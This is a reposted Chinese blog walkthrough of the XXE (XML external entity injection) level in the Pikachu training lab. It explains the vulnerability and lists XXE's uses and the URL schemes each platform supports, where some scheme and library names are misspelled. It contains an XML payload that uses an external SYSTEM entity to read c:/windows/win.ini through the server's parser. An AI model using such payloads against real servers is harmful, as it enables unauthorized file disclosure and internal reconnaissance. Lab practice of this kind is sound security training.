自学内容网 自学内容网

pikachu XXE(XML外部实体注入)通关

靶场:pikachu

环境:

系统:Windows10
服务器:PHPstudy2018
靶场:pikachu

关卡提示说:这是一个接收xml数据的api

常用的Payload

回显

<?xml version="1.0"?> 
<!DOCTYPE foo [    
<!ENTITY xxe "XXE" > ]> 
<foo>&xxe;</foo>

 执行结果

查看系统文件内容

<?xml version="1.0"?> 
<!DOCTYPE foo [    
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" > ]> 
<foo>&xxe;</foo>

 执行结果

XXE的危害:

  1. 文件读取

  2. 内网主机扫描

  3. 端口探测

  4. 远程代码执行

XXE漏洞可利用的协议:

  1. ilbxml2=file/http/ftp

  2. PHP=file、http、ftp、php、compress.zlib、compress.bzip2、data、glob、phar

  3. Java=http、https、ftp、file、jar、netdoc、mailto、gophar

  4. NET=file、http、https、ftp

概述

XXE -"xml external entity injection"
既"xml外部实体注入漏洞"。
概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题"
也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。


原文地址:https://blog.csdn.net/2301_77012231/article/details/142344496

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!